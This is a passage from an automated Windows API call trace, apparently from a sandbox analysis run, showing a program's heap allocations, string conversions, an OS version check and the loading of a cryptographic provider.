Flags=0x0, Size=0x8) returned 0x24b1838 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0195.891] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1e8 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0195.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.891] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0195.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0195.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0195.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0195.892] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0195.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0195.893] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f78 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0195.893] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0195.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.893] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0195.894] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0195.894] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0195.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0195.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0195.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0195.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0195.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0195.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0195.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0195.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.897] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.897] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0195.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0195.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.898] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0195.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.898] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0195.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0195.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0195.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.899] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0195.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0195.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0195.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0195.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0195.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0195.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.899] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.899] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad6480) returned 1 [0195.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.900] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0195.901] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0195.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0195.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0195.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0195.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0195.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0195.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.902] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.902] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0195.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0195.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0195.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0195.902] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0195.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0195.902] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0195.903] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0195.903] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0195.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0195.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0195.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0195.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1368 [0195.903] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0195.903] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0195.903] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, 